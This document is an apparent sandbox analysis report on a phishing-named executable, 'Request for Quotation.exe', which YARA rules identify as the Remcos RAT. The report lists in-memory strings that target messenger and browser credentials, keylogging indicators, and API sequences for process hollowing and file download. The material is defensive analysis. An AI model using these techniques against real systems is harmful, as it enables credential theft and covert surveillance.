          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00402149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_00402149
          Source: Request for Quotation.exe, 00000004.00000002.652481642.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
          Source: Request for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmpString found in binary or memory: earchhttps://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3ktYWIQAzIFCAAQsQMyCAgAELEDEIMBMgUIABCxAzIFCAAQsQMyBQgAELEDMgUIABCxAzIICAAQsQMQgwEyAggAMgIIADIFCAAQsQM6CwguELEDEMcBEKMCOggILhCxAxCDAToOCC4QsQMQgwEQxwEQowI6CwguELEDEIMBEJMCOgUILhCxAzoLCC4QsQMQxwEQrwE6AgguUMpIWMFNYPhRaABwAHgAgAF_iAHIBJIBAzUuMZgBAKABAaoBB2d3cy13aXo&sclient=psy-ab&ved=0ahUKEwik3ey3rJDsAhU-BGMBHSocCmAQ4dUDCAw&uact=5https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/intl/en_uk/chrome/thank-you.htmlhttps://www.google.com/intl/en_uk/chrome/https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQFjAAegQIDhAB&url=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F&usg=AOvVaw3tRKGAbA7yncokivgyNZzyhttps://www.google.com/urlhttps://www.google.com/?gws_rd=sslhttps://www.google.com/http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=1&hl=enhttps://ogs.google.com/widget/callouthttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=278&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x2
71&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=145&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591https://consent.google.com/done8https://consent.google.com/set?pc=s&uxe=4421591https://consent.google.com/sethttps://consent.google.com/?hl=en-GB&origin=https://www.goog
          Source: Request for Quotation.exe, 00000003.00000003.652133843.00000000022C3000.00000004.00000001.sdmpString found in binary or memory: http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/searchhttps://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3ktYWIQAzIFCAAQsQMyCAgAELEDEIMBMgUIABCxAzIFCAAQsQMyBQgAELEDMgUIABCxAzIICAAQsQMQgwEyAggAMgIIADIFCAAQsQM6CwguELEDEMcBEKMCOggILhCxAxCDAToOCC4QsQMQgwEQxwEQowI6CwguELEDEIMBEJMCOgUILhCxAzoLCC4QsQMQxwEQrwE6AgguUMpIWMFNYPhRaABwAHgAgAF_iAHIBJIBAzUuMZgBAKABAaoBB2d3cy13aXo&sclient=psy-ab&ved=0ahUKEwik3ey3rJDsAhU-BGMBHSocCmAQ4dUDCAw&uact=5https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/intl/en_uk/chrome/thank-you.htmlhttps://www.google.com/intl/en_uk/chrome/https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQFjAAegQIDhAB&url=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F&usg=AOvVaw3tRKGAbA7yncokivgyNZzyhttps://www.google.com/urlhttps://www.google.com/?gws_rd=sslhttps://www.google.com/http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=1&hl=enhttps://ogs.google.com/widget/callouthttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=278&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/medi
anet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=145&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&
          Source: Request for Quotation.exe String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
          Source: Request for Quotation.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: Request for Quotation.exe, 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
          Source: Request for Quotation.exe, 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
          Source: Request for Quotation.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Request for Quotation.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Request for Quotation.exe String found in binary or memory: http://www.ebuddy.com
          Source: Request for Quotation.exe String found in binary or memory: http://www.imvu.com
          Source: Request for Quotation.exe, 00000004.00000002.652481642.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
          Source: Request for Quotation.exe, 00000004.00000002.652481642.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.imvu.comr
          Source: Request for Quotation.exe, 00000003.00000002.654097061.0000000000193000.00000004.00000010.sdmp String found in binary or memory: http://www.nirsoft.net
          Source: Request for Quotation.exe, Request for Quotation.exe, 00000005.00000001.652992004.0000000000400000.00000040.00020000.sdmp String found in binary or memory: http://www.nirsoft.net/
          Source: Request for Quotation.exe, 00000003.00000003.652133843.00000000022C3000.00000004.00000001.sdmp, Request for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
          Source: Request for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&cr
          Source: Request for Quotation.exe String found in binary or memory: https://login.yahoo.com/config/login
          Source: Request for Quotation.exe, 00000003.00000003.652407744.00000000022C3000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
          Source: Request for Quotation.exe, 00000003.00000003.652407744.00000000022C3000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
          Source: Request for Quotation.exe String found in binary or memory: https://www.google.com
          Source: Request for Quotation.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
          Source: Request for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          Contains functionality to capture and log keystrokes
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Esc] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Enter] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Tab] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Down] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Right] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Up] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Left] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [End] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [F2] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [F1] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Del] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Esc] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Enter] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Tab] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Down] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Right] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Up] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Left] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [End] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [F2] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [F1] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: [Del] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 0_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004054B2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@
2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait1_2_0040D2A6
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 1_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx, 1_2_0040532D
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 1_1_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx, 1_1_0040532D

          E-Banking Fraud:

          Yara detected Remcos RAT
          Source: Yara match File source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Request for Quotation.exe PID: 7164, type: MEMORY
          Source: Yara match File source: Process Memory Space: Request for Quotation.exe PID: 612, type: MEMORY
          Source: Yara match File source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
          Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
          Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
          Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Initial sample is a PE file and has a suspicious name
          Source: initial sample Static PE information: Filename: Request for Quotation.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 1_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 1_2_0040F219
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 1_1_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 1_1_0040F219
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 3_2_0040DD85
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 3_2_00401806 NtdllDefWindowProc_W, 3_2_00401806
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 3_2_004018C0 NtdllDefWindowProc_W, 3_2_004018C0
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 3_1_0040DD85 CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId, 3_1_0040DD85
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 3_1_0040DE0B NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,OpenProcess,GetCurrentProcess,DuplicateHandle,NtQueryObject,CloseHandle,CloseHandle, 3_1_0040DE0B
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 4_2_00402CAC NtdllDefWindowProc_A, 4_2_00402CAC
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 4_2_00402D66 NtdllDefWindowProc_A, 4_2_00402D66
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 5_2_004016FC NtdllDefWindowProc_A, 5_2_004016FC
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 5_2_004017B6 NtdllDefWindowProc_A, 5_2_004017B6
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403486
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@
2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_t